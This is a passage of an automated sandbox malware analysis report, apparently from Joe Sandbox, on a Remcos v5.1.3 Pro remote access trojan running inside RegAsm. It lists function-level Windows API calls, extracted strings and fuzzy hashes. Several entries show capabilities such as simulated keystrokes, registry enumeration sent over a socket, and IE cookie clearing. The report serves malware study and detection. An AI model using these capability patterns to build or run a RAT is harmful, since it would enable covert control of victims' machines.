                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                  • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                  • API String ID: 4067487056-2212855755
                                                                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                  • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3864826663-0
                                                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                  APIs
                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InputSend$Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 1167301434-0
                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                  • String ID: a/p$am/pm$h{D
                                                                                  • API String ID: 2936374016-2303565833
                                                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                  APIs
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$AllocateHeap
                                                                                  • String ID: KED
                                                                                  • API String ID: 3033488037-2133951994
                                                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                  APIs
                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Enum$InfoQueryValue
                                                                                  • String ID: [regsplt]$xUG$TG
                                                                                  • API String ID: 3554306468-1165877943
                                                                                  • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                  • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                  • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                  • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                  • String ID: xUG$NG$NG$TG
                                                                                  • API String ID: 3114080316-2811732169
                                                                                  • Opcode ID: 745f972cfa11915ef44f02aa1c783f0a8593c52f4c22ebb7385fc9c972742d46
                                                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                  • Opcode Fuzzy Hash: 745f972cfa11915ef44f02aa1c783f0a8593c52f4c22ebb7385fc9c972742d46
                                                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                  APIs
                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                  • API String ID: 3286818993-122982132
                                                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                  APIs
                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                  • API String ID: 1133728706-4073444585
                                                                                  • Opcode ID: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                  • Opcode Fuzzy Hash: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                  APIs
                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                  • _free.LIBCMT ref: 10009315
                                                                                  • _free.LIBCMT ref: 10009320
                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                  • _free.LIBCMT ref: 10009336
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                  APIs
                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                  • _free.LIBCMT ref: 00451032
                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                  • _free.LIBCMT ref: 00451048
                                                                                  • _free.LIBCMT ref: 00451053
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                  • String ID: (mG
                                                                                  • API String ID: 2536120697-4059303827
                                                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                  APIs
